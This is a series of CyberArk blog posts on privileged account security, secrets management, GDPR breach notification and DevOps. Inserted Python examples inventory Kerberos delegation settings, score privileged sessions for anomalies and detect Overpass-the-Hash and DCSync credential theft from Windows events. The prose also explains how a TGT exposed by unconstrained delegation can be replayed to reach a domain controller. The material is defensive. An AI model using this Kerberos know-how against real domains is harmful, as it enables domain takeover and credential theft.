  • Power: One of my colleagues recently had a session with high school students. They talked about the concept of security and the consequences of being unsecure. He used some examples to help students think like an attacker in order to better understand the importance of defense. Students today have access to powerful tools that are freely available online and can do a lot of damage if used inappropriately. For example, there are encryption packages available for download, there are open source offensive tools on GitHub, and there are services that provide extreme compute, storage and analytics resources. Such resources can support brilliant and cool projects, but these tools could also be used “offensively” to spread ransomware and other malware or to attack websites using DDoS attacks. Perhaps here, children can draw lessons from their favorite superhero and decide to use power appropriately and ideally for good intentions.
  • Responsibility: A laptop with an internet connection provides a lot of power to an individual. It can be used for great projects or malice. As the saying goes, “With great power comes great responsibility.” This is a foundational concept—a philosophy—we all strive to be responsible citizens, adults, parents etc. I suppose the goal is to teach children to consider the options they have in any given situation. Encourage them to ask questions to more fully understand the consequences of their actions and the identities of those with whom they interact. It’s important to remind them not to be so trusting as people are not always who they appear to be online.

Interestingly, in most states in the US, teenagers have to take driver’s education, either privately or at school, as they learn how to drive. They practice driving many hours with adults before they take an exam. With technology, we just hand it over, increasingly at a younger age. Food for thought.

Understanding and Selecting a Secrets Management Platform https://www.cyberark.com/blog/understanding-selecting-secrets-management-platform/ Tue, 02 Jan 2018 17:36:06 +0000 https://www.cyberark.com/?p=20960/

As we kick off 2018, what hopefully is a very promising and secure year for you, it’s a good time to consider how securing secrets in your DevOps pipeline can reduce your risk exposure and attack surface. We recently posted an article on our blog exploring some of the many challenges security teams and enlightened developers face in managing the proliferation of secrets and privileged users throughout the DevOps pipeline. Basically, we addressed how to significantly reduce risk—without impacting velocity or negatively impacting the work of developers.

This can, understandably, seem like a daunting task, particularly when you consider the countless non-human actors—processes, services, containers, hosts and more—that constantly need privileged credentials to do everything from accessing other resources and services to communicating with databases to obtaining encryption keys. While certainly not a brand new phenomenon, organizations’ increasing reliance on automated cloud services, container-based deployments and microservices-based architectures has illuminated a massive gap in how they manage machine identities for non-human actors, or in other words, how they protect the secret information flowing from machine to machine with little or no human oversight. Remember—we’re no longer talking about securing a finite number of machines sitting on a rack somewhere, but instead, hundreds upon thousands of virtual machine instances running simultaneously at any given point in time.

For organizations that take advantage of DevOps’s agility without adequately securing the secrets and credentials used in their DevOps environment, there is urgency to take action.  DevOps automation not only builds and deploys apps at scale, but it also creates and assigns credentials and secrets at scale. If these secrets aren’t adequately secured and protected, then as the apps scale, the enterprise creates an ever-increasing technical debt of vulnerabilities.  Basically, the problem may be getting worse, at scale.

How can organizations get started? Some traditional security solutions for secrets management are simply not a great fit in today’s modern era of clouds, containers and DevOps. As a result, a new wave of “secrets management” platforms is emerging, and it’s changing the way organizations deliver identity, secrets and tokens—as well as the way they validate systems for automated establishment of trust.

The independent analyst firm Securosis has published new research examining the critical need for such modern secrets management tools. The crux of the paper, Understanding and Selecting a Secrets Management Platform, addresses the fact that security around provisioning access rights to services is largely absent today. Far too often, credentials are kept in cleartext within documents of various types, while many companies rely on identity stores’ systems to maintain a central point of control over identity and access rights. Yet, these systems lack a distribution mechanism to consistently support security policies across today’s mixed and increasingly complex cloud and DevOps environments.

Available for free download here, the Securosis research paper outlines:

  • The Challenge of Machine Identities: From both the security practitioner’s and the developer’s perspective.
  • Principal Customer Use Cases: A diverse set of real-life use cases, including API Gateways and access keys, services, build automation, provisioning machine identities, encrypting data and sharing.
  • Features and Functionality: The basic functions every secrets management platform needs to address, as well as advanced feature sets that are emerging, comprising deep log creation and integration options, tighter integration with IAM services, secret generation and secret revocation.
  • Deployment Considerations: How these platforms deploy, how they provide scalability and resiliency and how they integrate with the services they supply secrets to.

Effective secrets management is integral in transforming DevOps as we know it to a truly integrated secure DevOps, or DevSecOps model. We encourage you to download this timely piece of research. To learn more about the industry’s only platform-independent secrets management solution specifically architected to protect containerized and cloud-native applications across the DevOps pipeline, visit the CyberArk Conjur page.

Editor’s note: Join CyberArk and Securosis Security Analyst, Adrian Lane, for a webinar on January 25, 2018: “Secrets Management – Where Security and DevOps Intersect.”

Using Azure, AWS or Google? Protect Privileged Accounts in the Cloud for Consistent Enforcement of Security Policies https://www.cyberark.com/blog/using-azure-aws-google-protect-privileged-accounts-cloud-consistent-enforcement-security-policies/ Thu, 28 Dec 2017 17:33:25 +0000 https://www.cyberark.com/?p=20875/

CyberArk enables organizations to protect cloud assets by providing powerful solutions for securing privileged accounts and credentials at each stage of the cloud journey.

An increasing number of organizations don’t use just one cloud provider. For various reasons including business flexibility, multiple business lines, prior acquisitions, geographic coverage and redundancy, they use multiple cloud providers. Additionally, large organizations often have legacy, on-premises and hybrid environments, in which case, the same IT administrators may access and manage multiple compute, development and automation environments.

CISOs and IT leaders want, as a best practice, to be able to enforce the same security and access policies across the entire enterprise regardless of the compute environments, delivery pipelines and automation tools.

To implement this best practice, enterprises typically want to manage privileged user credentials and access permissions with a digital vault as a single control point.

CyberArk provides solutions for Azure and other cloud providers, including AWS and Google. In response to strong customer demand, CyberArk continues to enhance and expand its cloud and DevOps capabilities to meet the evolving needs of organizations adopting the cloud.

Whether your organization has fully embraced the cloud or is just starting the journey, it is essential to implement robust privilege management policies to protect your cloud assets. CyberArk has the solutions, resources and cloud expertise to help enterprises protect and secure the “keys to their cloud kingdom.”

For more information about securing your cloud assets, please check out “Securing the Enterprises Cloud Workloads on Microsoft Azure” and other resources available on our website.

Security is a Commercial Reality https://www.cyberark.com/blog/security-commercial-reality/ Fri, 15 Dec 2017 13:52:10 +0000 https://www.cyberark.com/?p=20472/

With high profile breach revelations seemingly part of the weekly news cycle and hard-hitting legislation like General Data Protection Regulation (GDPR) applying pressure to organizations worldwide, security awareness and best practices are now wound irretrievably into everyday commercial reality.

This, of course, is not news to IT security professionals, but what do C-level executives, departmental heads and functional leads make of security and how do they perceive its practice and importance?

The CyberArk Global Advanced Threat Landscape Report 2018 found that many organizations don’t seem to take data breach notification seriously. Half (50%) of the 1,300 plus respondents say their organization did not fully inform customers of past personal data compromises.

Organizations that are not fully transparent about data breaches affecting sensitive data risk serious consequences, such as loss of customers, executive turnover and increasingly severe regulatory penalties.

The ramifications are particularly significant for organizations that do business in the EU, where the GDPR data privacy law mandates pressing new obligations for data transparency.

The regulation, which goes into effect May 25, 2018, requires that companies must promptly inform regulators of a breach within 72 hours of discovery. Failure to do so could result in penalties of up to $24 million or 4% of annual global revenue, whichever is higher.

Is this a real problem or is the risk of a breach a low-level concern? Security professionals that answered our survey were not confident that a serious cyber security breach could be prevented; nearly half (46%) said their organization would not be able to stop every attempt to break into the internal network.

Consumers are increasingly aware of data privacy risks and organizations need to protect their sensitive information, so it is more important than ever to properly safeguard personal data and to be prepared to act, quickly and transparently, should a compromise occur. This is not a problem limited to the security team; it is a problem for the entire business.

With serious potential consequences, it’s not surprising that business respondents in our report believe that the executive team should take a more proactive role in cyber security awareness. In fact, more than three-quarters (78%) of line-of-business respondents say security should be discussed more frequently at the board level.

In this regard, business leaders are right on the mark. Senior executives must take responsibility and accountability for cyber security initiatives to effectively close the awareness gap and strengthen security programs.

To learn more about business leaders’ attitudes and practices around cyber security, read the CyberArk Global Advanced Threat Landscape 2018 Report.

Countdown to GDPR: Responding to the 72-hour Notification of a Personal Breach https://www.cyberark.com/blog/countdown-gdpr-responding-72-hour-notification-personal-breach/ Tue, 12 Dec 2017 17:00:16 +0000 https://www.cyberark.com/?p=20403/

Here’s a million dollar question (which could quite literally be a million dollar question, given the potential fines in play): How fast is your organization able to respond after a personal data breach? The General Data Protection Regulation (GDPR), which goes into effect May 25, 2018, requires that organizations report unauthorized access to personal data within 72 hours of detection.

If you’re thinking that seems like a tight window—you’re right. According to a recent industry study, only 10 percent of breached organizations were able to notify regulators within 72 hours of discovering a breach. Moreover, 38 percent reported notification took two to five months to complete.

Beyond this initial notification, GDPR Article 33 also requires that organizations describe and document the following information:

  • The nature of the personal data breach, the categories and approximate number of data subjects impacted
  • Likely consequences
  • Measures taken or proposed to be taken by the controller to address the personal data breach

The sobering truth is that attackers are likely hiding inside your environment right now, undetected, navigating the network in search of the right pathway to access sensitive data. To rapidly and accurately report on a breach—or, better yet, detect a threat before a breach occurs—you need robust operational controls. A strong Privileged Account Security strategy is critical to such control.

Detect and Block Threats Early in the Attack Cycle

Security tools and solutions are continuously developed to protect organizations from existing vulnerabilities and threats. But attackers are often a step ahead, plotting new, sophisticated ways to infiltrate organizations. That’s why it’s critical to adopt an attacker’s mindset when bolstering your security practices in preparation for GDPR. To do so, it’s important to detect and block threats early in the attack cycle. Consider these four steps:

  • First look for exposed privileged accounts. Do you have a solution in place for exposed credentials and unconstrained delegation alerts? Unconstrained delegation gives a service the ability to impersonate a user in another service. This presents a security impact. When unconstrained delegation has been enabled, as the privileged user connects to your machine, their ticket-granting-ticket (TGT) will be stored in memory, which can be replayed to move laterally and compromise a domain controller.
  • Identify controls that can bypass privileged account security. Privileged accounts are a significant vulnerability when unsecured, and they exist across every organization. Can you identify how many privileged accounts and service accounts you have under management? Are they secured? Is there a solution in place that can detect suspected credential theft or rotate credentials and passwords to prevent attackers from escalating privileges and navigating their environment?
  • Identify attacks known to bypass authentication. Do you have a way of detecting attacks that exploit Kerberos authentication? These attacks can be very damaging—some of which provide significant, unrestricted access and unlimited time for reconnaissance. Are you considering attacks that are launched deep within the network?
  • Detect the abuse of privileged access. Can you clearly define the type of activity that is normal? In other words, business as usual versus activity that is anomalous and may be risky to the organization? Are you taking that risk-based approach to privileged account security? Do you have a solution that will prevent attackers from gaining access to critical systems and applications that are holding sensitive personal EU data?
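The first checkpoint above (look for exposed privileged accounts and unconstrained delegation) can be turned into a defensive inventory check. The following is an added example, not CyberArk's code: it classifies the delegation configuration of each account in a directory export from the documented `userAccountControl` bits, flags unconstrained delegation on anything that is not a domain controller, and also flags privileged users that are not marked "account is sensitive and cannot be delegated", the usual mitigation for the TGT-in-memory exposure described above. The account records and the `privileged` marker (standing in for group-membership data) are constructed for the example.

```python
"""Added example: inventory Kerberos delegation settings from a directory export.

Not CyberArk's code. The userAccountControl bit values are the documented
ones; the account records below are constructed for illustration.
"""
from typing import Dict, List

# Documented userAccountControl bits.
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # constrained delegation with protocol transition
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
SERVER_TRUST_ACCOUNT = 0x2000               # domain controller computer account

# Constructed export. "privileged" stands in for the group-membership data a
# real export would carry (assumption); values are written in hex for readability.
ACCOUNTS: List[Dict] = [
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000, "privileged": False},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000, "privileged": False},
    {"sAMAccountName": "SQL01$", "userAccountControl": 0x1001000,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/db01.corp.example:1433"], "privileged": False},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x10000, "privileged": True},
    {"sAMAccountName": "admin_jdoe", "userAccountControl": 0x100200, "privileged": True},
]


def delegation_type(account: Dict) -> str:
    """Classify delegation from the UAC bits and msDS-AllowedToDelegateTo."""
    uac = int(account["userAccountControl"])
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if account.get("msDS-AllowedToDelegateTo"):
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            return "constrained (protocol transition)"
        return "constrained"
    return "none"


def assess(accounts: List[Dict]) -> List[Dict]:
    """Return prioritized findings; domain controllers are expected to be unconstrained."""
    findings: List[Dict] = []
    for acct in accounts:
        name = acct["sAMAccountName"]
        uac = int(acct["userAccountControl"])
        dtype = delegation_type(acct)
        if dtype == "unconstrained" and not uac & SERVER_TRUST_ACCOUNT:
            findings.append({"account": name, "severity": "high",
                             "issue": "unconstrained delegation on a non-domain-controller"})
        elif dtype == "constrained (protocol transition)":
            targets = ", ".join(acct["msDS-AllowedToDelegateTo"])
            findings.append({"account": name, "severity": "medium",
                             "issue": "constrained delegation with protocol transition to " + targets})
        if acct.get("privileged") and not uac & NOT_DELEGATED:
            findings.append({"account": name, "severity": "medium",
                             "issue": "privileged account not marked 'cannot be delegated'"})
    return findings


if __name__ == "__main__":
    for f in assess(ACCOUNTS):
        print(f"[{f['severity']}] {f['account']}: {f['issue']}")
```

Running the same logic on a periodic export gives a change-tracked list of delegation-capable hosts, which is what an "unconstrained delegation alert" is built on: any new entry in the high-severity bucket is worth a ticket.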

Blocking unauthorized access to personal data helps you prevent reportable data breaches in the first place. As much as possible, automatic detection and blocking access should be a proactive function built into your Privileged Account Security solution. This type of early detection is different than perimeter defenses, which are monitoring and security controls focused on protecting your systems from attacks from the outside. A strong Privileged Account Security strategy focuses on proactively detecting threats to personal data from the inside out. Real-time profiling and analyzing individual privileged session behavior within the network can help an organization detect breaches early, with prioritized alerts, when abnormal activity is detected.
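As an added example of the profiling idea in the paragraph above (define what is normal for each privileged user, then raise prioritized alerts on deviations), the block below builds a per-user baseline of target hosts, session types and working hours from historical privileged sessions and scores new sessions against it. This is not CyberArk's analytics; the session records, the record format and the scoring weights are assumptions constructed for the example.

```python
"""Added example: baseline-and-deviation scoring of privileged sessions.

Not CyberArk's analytics. The session records, field layout and weights
are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed history of privileged sessions: "timestamp user target session_type".
HISTORY = """\
2017-11-01T09:05:00 admin_jdoe web01 ssh
2017-11-02T10:15:00 admin_jdoe web01 ssh
2017-11-03T14:40:00 admin_jdoe web02 ssh
2017-11-06T11:00:00 admin_jdoe web02 ssh
2017-11-01T08:30:00 dba_asmith db01 sql
2017-11-02T09:10:00 dba_asmith db01 sql
2017-11-03T16:20:00 dba_asmith db02 sql
"""

# Constructed new sessions to score against the baseline.
NEW_SESSIONS = """\
2017-12-04T10:30:00 admin_jdoe web01 ssh
2017-12-04T02:45:00 admin_jdoe dc01 rdp
2017-12-05T15:00:00 dba_asmith db02 sql
2017-12-05T17:10:00 dba_asmith fileserver01 smb
"""

Session = Tuple[datetime, str, str, str]


def parse(lines: str) -> List[Session]:
    out: List[Session] = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        ts, user, target, kind = line.split()
        out.append((datetime.fromisoformat(ts), user, target, kind))
    return out


def build_baseline(history: str) -> Dict[str, Dict[str, set]]:
    """Per user: the targets, session types and hours of day seen so far."""
    baseline: Dict[str, Dict[str, set]] = defaultdict(
        lambda: {"targets": set(), "kinds": set(), "hours": set()})
    for ts, user, target, kind in parse(history):
        b = baseline[user]
        b["targets"].add(target)
        b["kinds"].add(kind)
        b["hours"].add(ts.hour)
    return baseline


def score_session(baseline: Dict[str, Dict[str, set]], session: Session) -> Tuple[int, List[str]]:
    """Additive risk score (assumed weights) with human-readable reasons."""
    ts, user, target, kind = session
    if user not in baseline:
        return 100, ["no baseline for user"]
    b = baseline[user]
    score, reasons = 0, []
    if target not in b["targets"]:
        score += 40
        reasons.append(f"new target {target}")
    if kind not in b["kinds"]:
        score += 30
        reasons.append(f"new session type {kind}")
    # Within one hour of any previously observed hour counts as normal.
    if not any(abs(ts.hour - h) <= 1 for h in b["hours"]):
        score += 30
        reasons.append(f"unusual hour {ts.hour:02d}:00")
    return score, reasons


def prioritized_alerts(history: str, new_sessions: str, threshold: int = 30) -> List[Dict]:
    """Score every new session and return alerts sorted highest risk first."""
    baseline = build_baseline(history)
    alerts: List[Dict] = []
    for s in parse(new_sessions):
        score, reasons = score_session(baseline, s)
        if score >= threshold:
            alerts.append({"user": s[1], "target": s[2], "score": score, "reasons": reasons})
    alerts.sort(key=lambda a: a["score"], reverse=True)
    return alerts


if __name__ == "__main__":
    for a in prioritized_alerts(HISTORY, NEW_SESSIONS):
        print(f"score={a['score']:3d} user={a['user']} target={a['target']} reasons={a['reasons']}")
```

The point of the ordering is operational: an off-hours session from a domain admin to a domain controller over a protocol that admin has never used sorts above a DBA reaching a new file server, so the analyst's queue is prioritized rather than flat.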

In our second GDPR advisory, we outline a list of proactive detection and privileged access accounting checkpoints to help you prepare for GDPR notification and reporting requirements. To learn more about detecting and responding rapidly to breaches, contact your sales representative, view our on-demand webinar series, or visit here to learn how CyberArk can help your organization with GDPR readiness.

Related Resource: Infographic: Responding to the 72 Hour Notification of a Personal Data Breach

AWS re:Invent Delivered Lots of Excitement and News, Yet Security Awareness Lags for Some https://www.cyberark.com/blog/aws-reinvent-delivered-lots-excitement-news-yet-security-awareness-lags/ Fri, 08 Dec 2017 01:35:17 +0000 https://www.cyberark.com/?p=20292/

Last week, I joined about 40,000 people at AWS re:Invent. While clearly AWS-focused, the conference has become the leading cloud, and maybe even the leading infrastructure, event. With information on cloud and DevOps in sessions and on the show floor, it was great to be there. There was also the bonus of having the Gartner Identity and Access Management (IAM) Summit in Vegas during the same week, and I’ll include some details on that below.

Demoing New Capabilities

Product management, product marketing and our systems engineers took the opportunity to talk to many developers and IT professionals at re:Invent, and we gained helpful insights about some of the immediate and emerging security challenges that customers face and want CyberArk to address. More to come on that in 2018. We also got very positive responses from our demo of the Conjur secrets management solution for DevOps, especially showing off the UI and then switching into code. There was a lot of interest in the Open Source version. We also demoed our integrations with AWS, including the CyberArk Amazon Machine Images (AMI) and CloudFormation Templates (CFT), and the recently announced integration of the Enterprise Password Vault with AWS CloudWatch that automatically on-boards SSH keys for newly created instances.

Security Is A Priority – But Not Everyone Is Addressing It

While there was significant emphasis on security at the event, AWS continues to emphasize the shared responsibility model. AWS announced several enhancements to its identity and security offerings, but it struck me that there are still some major, unaddressed gaps in cloud and DevOps security awareness and needs. Moreover, even heightened awareness of the vulnerabilities does not always drive remedial action.

The good news, for you, is that if you’re reading this post you probably know CyberArk, in which case you are likely already ahead of many of your peers. I had the opportunity to speak to several very knowledgeable and savvy developers and cloud engineers at re:Invent. My impression was that while there is tremendous interest in learning more about securing cloud workloads and DevOps environments, many organizations have a long way to go. For example, I spoke with several people that still hardcode credentials, secrets and access keys; others are stringing together multiple tools and environments to store their secrets. These security gaps are significant. But, if you’ve evaluated the Conjur Community Edition (available at conjur.org at no cost), or if you already use CyberArk Conjur, CyberArk Enterprise Password Vault or other CyberArk solutions, you are likely on the right track to address your organization’s cloud and hybrid security concerns. If not, please reach out to us.

Expanding AWS Capabilities

No surprises here, but AWS continues to aggressively expand its platform and offerings, including several developer-focused offerings, APIs, and integrated tools such as the browser-based AWS Cloud9 Integrated Development Environment (IDE), and the expansion of AWS Lambda serverless computing capabilities. AWS also announced significant expansion of its Machine Learning (ML) capabilities with Amazon SageMaker and Artificial Intelligence (AI) capabilities with AWS Rekognition, as well as video analysis for live streaming and translation services (which tie back to ML and AI). These initiatives aim to make powerful ML and AI capabilities accessible to developers across a range of organizations. While these new AWS capabilities have some of the same security needs as other cloud-based services (S3, EC2, etc.), they each likely require vast amounts of data – which IT and security professionals will need to protect. Innovative companies will leverage these capabilities to offer new services, and of course, AWS is motivated to increase adoption of cloud-based services. These new capabilities have the potential to accelerate an enterprise’s cloud journey, but also potentially expose new security needs to address. Our goal is to be ready for you at each stage of your cloud journey.

For more detail on the developer highlights, refer to “AWS re:Invent Recap – Amazon Lures Developers With New Tools And APIs” by Janakiram MSV — published in Forbes.

Gartner IAM

Cloud and DevOps topics were also front and center at the Gartner Identity and Access Management (IAM) Summit. Attendees explored how both market and technology forces are shaping the future of IAM, and participated in deep dives on topics ranging from analytics and blockchain to artificial intelligence and microservices. A few of the highlights included a session by Gartner Research Director Felix Gaehtgens, “Manage Privileged Access to Reduce Security Risks and Increase Agility,” that covered privileged access management (PAM) fundamentals, an overview of available tools and a peek at technologies along the PAM maturity curve. Additionally, Research VP Lori Robinson’s session, “Protect the Keys to the Kingdom! Secure Privileged Access in an IaaS Environment,” homed in on privileged access as an essential security control in IaaS environments for risk mitigation.

A colleague and I presented “CyberArk: Privileged Related Risks Lurking in Your Cloud? Halt Stealthy Threats” at the Summit. The slides are available here.

Making Security a Priority

Bottom line – it was a very enlightening and productive week in Vegas with the two conferences, where it was clear that identity and security for cloud and DevOps will continue to be a top-of-mind priority for enterprises. On a side note, at the parent-teacher conference I attended this week, I discovered my high school senior’s programming class uses the AWS Cloud9 development environment – no surprise, but security isn’t yet on their agenda. I think (hope) we all know it needs to be on the top of ours!

For additional information, please visit Cyberark.com/cloud, or to download the open source edition of our secrets management solution visit conjur.org.

]]>
Preventing Attacks Launched Deep within the Network https://www.cyberark.com/blog/preventing-attacks-launched-deep-within-network/ Thu, 07 Dec 2017 14:45:15 +0000 https://www.cyberark.com/?p=20262/

Attacks that exploit Kerberos, a Windows authentication protocol, have been behind some of the biggest breaches in recent history. These attacks are troublesome for many different reasons, including a complete and total loss of control over the domain controller. Threat actors have uncovered a number of different vulnerabilities that exist within the Kerberos protocol, and when successful, they’re able to elevate unprivileged domain accounts to those of the domain administrator account. The intent of the attacker is to leverage Kerberos tickets to appear to be a legitimate, fully authorized user when authenticating to various systems within the network.

These attacks are extremely difficult to detect, and even more difficult to prevent. Other solutions in the market have the ability to detect Kerberos attacks but come with limited functionality, agent-based performance issues and well-documented bypassing techniques, calling into question the value and effectiveness of these solutions. CyberArk Privileged Threat Analytics is the only solution able to detect, alert, prevent and remediate a variety of different flavors of Kerberos-style attacks (Golden Ticket, Overpass-the-Hash, DCSync and PAC [MS14-068] attacks).

Attackers will get inside. It’s what they do. Far too many organizations continue to focus on defending solely against perimeter attacks without considering the impact and devastation of an attack launched from deep within the network. Moreover, while vaulting credentials is certainly a best practice, privileged credentials are often not required for the attacker to be successful in this type of attack, so organizations will undoubtedly benefit from the analytics capabilities CyberArk can provide. This type of attack needs to be prioritized and top of mind for every security operations team.

In this demo, we walk through an example of how CyberArk Privileged Threat Analytics is able to not only detect, but also automatically stop an attack, preventing further damage to a domain controller. This scenario presents a situation where an attacker gains access to a compromised machine and utilizes a post-exploitation tool to move laterally to a domain controller. The attacker then uses a hash stolen from a logged-in user on the compromised machine, performs an Overpass-the-Hash attack, and gains access to the domain controller. Watch the video below to see how CyberArk detects this activity and breaks the attack chain before irreparable damage is done.
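As an added example that is not CyberArk Privileged Threat Analytics code, the following Python shows the kind of event-log heuristics a SOC can apply for two of the flavors named above, Overpass-the-Hash (an RC4 ticket request for an account that normally gets AES tickets) and DCSync (replication rights exercised by something that is not a domain controller). The events, hosts and account names are constructed; the event IDs, field names and control-access-right GUIDs are the public Windows ones.

```python
import re
from typing import Iterable, List, Set, Tuple

# Added example, not CyberArk PTA logic. Events are constructed dicts that use the
# field names of the real Windows Security events: 4768 = Kerberos TGT requested,
# 4662 = an operation was performed on an Active Directory object.

RC4_HMAC = "0x17"              # etype a TGT gets when it is obtained from an NTLM hash
AES_TYPES = {"0x11", "0x12"}   # AES128-CTS / AES256-CTS
# Control-access rights a replication (DCSync) request exercises:
# DS-Replication-Get-Changes and DS-Replication-Get-Changes-All
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

Alert = Tuple[str, str, str]   # (rule, account, detail)


def detect_overpass_the_hash(events: Iterable[dict]) -> List[Alert]:
    """Flag an RC4 TGT request for an account whose earlier TGTs were AES.

    An attacker holding only an NTLM hash must ask for RC4 tickets, so an
    encryption downgrade for an account with an AES baseline is the classic
    indicator. In a domain that still uses RC4 routinely this rule is noisy;
    build the baseline over a long window before alerting on it.
    """
    seen_aes: Set[str] = set()
    alerts: List[Alert] = []
    for e in events:
        if e.get("EventID") != 4768:
            continue
        user = e["TargetUserName"].lower()
        etype = e["TicketEncryptionType"].lower()
        if etype in AES_TYPES:
            seen_aes.add(user)
        elif etype == RC4_HMAC and user in seen_aes:
            alerts.append(("overpass_the_hash", user,
                           f"RC4 TGT from {e['IpAddress']} after AES baseline"))
    return alerts


def detect_dcsync(events: Iterable[dict], domain_controllers: Set[str]) -> List[Alert]:
    """Flag replication rights (event 4662) used by any account that is not a DC."""
    dcs = {d.lower().rstrip("$") for d in domain_controllers}
    alerts: List[Alert] = []
    for e in events:
        if e.get("EventID") != 4662:
            continue
        subject = e["SubjectUserName"]
        guids = {g.lower() for g in GUID_RE.findall(e.get("Properties", ""))}
        if guids & REPLICATION_GUIDS and subject.lower().rstrip("$") not in dcs:
            alerts.append(("dcsync", subject,
                           f"replication rights used on {e.get('ObjectName', '?')}"))
    return alerts


def run_all(events: List[dict], domain_controllers: Set[str]) -> List[Alert]:
    return detect_overpass_the_hash(events) + detect_dcsync(events, domain_controllers)


# Constructed sample log: two normal AES TGTs for jsmith, then an RC4 TGT from a
# different host, a DC replicating normally, and a user account replicating.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "jsmith", "IpAddress": "10.0.1.25",
     "TicketEncryptionType": "0x12"},
    {"EventID": 4768, "TargetUserName": "jsmith", "IpAddress": "10.0.1.25",
     "TicketEncryptionType": "0x12"},
    {"EventID": 4768, "TargetUserName": "WS07$", "IpAddress": "10.0.1.7",
     "TicketEncryptionType": "0x17"},   # RC4 with no AES baseline: not flagged
    {"EventID": 4768, "TargetUserName": "jsmith", "IpAddress": "10.0.5.77",
     "TicketEncryptionType": "0x17"},   # downgrade for an AES account: flagged
    {"EventID": 4662, "SubjectUserName": "DC01$", "ObjectName": "DC=corp,DC=example",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jsmith", "ObjectName": "DC=corp,DC=example",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for rule, account, detail in run_all(SAMPLE_EVENTS, {"DC01$"}):
        print(f"[{rule}] {account}: {detail}")
```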


Request a live demo to see Privileged Threat Analytics in action or download the Data Sheet for more information.

]]>
Decoding DevOps Security: Insights for CISOs and Security Leaders https://www.cyberark.com/blog/decoding-devops-security-insights-cisos-security-leaders/ Tue, 05 Dec 2017 17:05:38 +0000 https://www.cyberark.com/?p=20203/

To increase the speed of delivering new software features and value to even the most “traditional” enterprise businesses, such as banking, utilities and staid government organizations, developers are shifting to a DevOps mode. Meanwhile, security teams scramble to secure and manage the plethora of new tools and technologies used to deliver on that promise. The biggest gap security teams face today is the massive proliferation of secrets and privileged users throughout the DevOps pipeline. Both teams have to deliver without compromising on security.

Now more than ever, it’s important to find a way to meet speed and agility with faster security and compliance delivery. But as a CISO, where do you start?

First, while the list of tools and technologies can seem to be overwhelming and disparate, it’s important to remember that you do not need to know every single tool in order to help control the security of DevOps environments. A strong foundation requires a system-based approach that is API driven. APIs are the lingua franca of today’s software development systems, and it’s how next generation users and their technologies of choice will want to interact with security tools. The more abstraction of security “as a service” the better, because it shifts the burden of managing security policy, tooling and reporting from the development teams and puts the control back into the hands of the security team.

With this in mind, the security team needs a set of best practices based upon the desired security posture for the environment, AND THE PATH OF LEAST RESISTANCE for end users. You don’t want teams to come up with solutions or implementation details on the fly in order to meet their deadlines and deliverables.

Easy wins with the development teams include the following basic principles, because they already know these are good practices but just may not be doing them visibly or consistently:

  • First, no secrets in source control.
  • Second, follow least privileged access control across your entire infrastructure. The over-privileging of system accounts can be tremendous and very risky.
  • Third, micro-segmentation of access to secrets, passwords, SSH keys, etc. is essential in minimizing the impact of any potential breach or event. In fact, the events you should work to minimize are not just security-related (where some malicious actor has gained access to infrastructure) but are also what we call “misadventure,” or human mistakes that are bound to happen. Things are moving so fast in DevOps environments that one could quite literally screw up at the speed of light. You need to have a bit of a throttle, so that when this happens (and it inevitably will), you can easily roll back to a previous environment or rotate a key.

Key Considerations for Privilege and Machine Identities

One of the key differences in controlling privileged access in a DevOps environment is homing in on the path on which no human user is involved. These privileges are exercised on a daily—even minute-to-minute—basis. Imagine a scenario whereby I’ve written a script, and I can launch instances in AWS from that script and those are all privileged in order to access a key database from my organization. In this instance, there is no human involvement. It could’ve just been a big red button called “deploy here,” and thus, there’s really no traceability back to a human user to identify how this infrastructure got there, where it came from, how it got its permissions, etc. Tools that can specifically recognize and identify machine and system account users and can ultimately authorize them based on policy—and then audit that entire transaction—are crucial for forensic analysis, for governance of least privilege, and for the ability to ensure that you have a security posture consistent with whatever your program or policy might be.

Extending Your Privileged Account Security Programs

Privileged account security is a proactive step you can take to mitigate risk. A crucial first step is to devise a program early on that enables you to curate, and distribute via automation, consistent security policies for access to cloud keys and credentials—in a compliant way. Far too often, organizations scramble to remediate issues, as opposed to implementing solid best practices from the start.

For companies with existing privileged account security programs in place, the goal is to extend those solutions into the next generation infrastructure. We call this trust forward. Trust forward is the concept that you can leverage existing tools, protocols and existing certified solutions and map them to these next generation workflows. This is possible because best practices around controlling privileged account credentials have built up over decades, some of which cannot be jettisoned as we move into the new world. What we do need to do is acknowledge when they do and don’t work with the new workflows, and that’s key. Some break-glass, two-key human user escalation workflows should remain in the hands of humans, and not bots, to make the key and critical decisions, with full session recording.

What Your DevOps Colleagues Need to Realize About Security Tools

Some DevOps personnel have had negative experiences with timeliness and delivery of security in the past. So it’s critical that they understand it doesn’t have to be that way—speed, velocity and resiliency do not need to be sacrificed in order to be secure. But it also can’t be bespoke to any one development group’s tools and preferences. The business needs a consistent security and risk posture across all groups, tools and technologies.

From a cultural standpoint, it’s important for DevOps engineers to embrace that their security team has something important to offer in terms of best practices and know-how. They have experience and focus to deliver, and they are now being empowered with tools that have been designed with the developer and operations team user experience in mind. Tools like CyberArk Conjur can effectively bridge the two methodologies and help people to work together collaboratively—and at velocity—to secure their infrastructure. From a technological standpoint, it’s important to think ahead and select best-of-breed solutions that are going to evolve with their infrastructure. Partner with companies that can drive an agenda forward—which may include one set of tools today and an entirely different set of tools tomorrow.

